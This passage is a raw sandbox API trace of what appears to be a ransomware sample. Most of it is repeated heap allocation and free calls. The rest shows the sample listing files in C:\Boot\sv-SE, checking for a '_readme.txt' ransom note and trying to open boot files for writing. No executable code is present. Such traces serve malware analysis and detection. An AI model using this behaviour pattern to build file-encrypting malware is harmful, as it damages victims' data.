dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.076] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.076] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.077] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.077] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.078] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.078] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.081] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0130.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.082] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.082] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.082] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.082] PathFindFileNameW (pszPath="") returned="" [0130.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.082] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.082] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.083] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0130.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.083] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2280 [0130.083] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0130.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.083] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0130.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.084] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.084] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.084] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.084] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0130.084] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0130.084] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe392ace0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.085] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned=".txt" [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0130.085] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe392ace0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.085] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 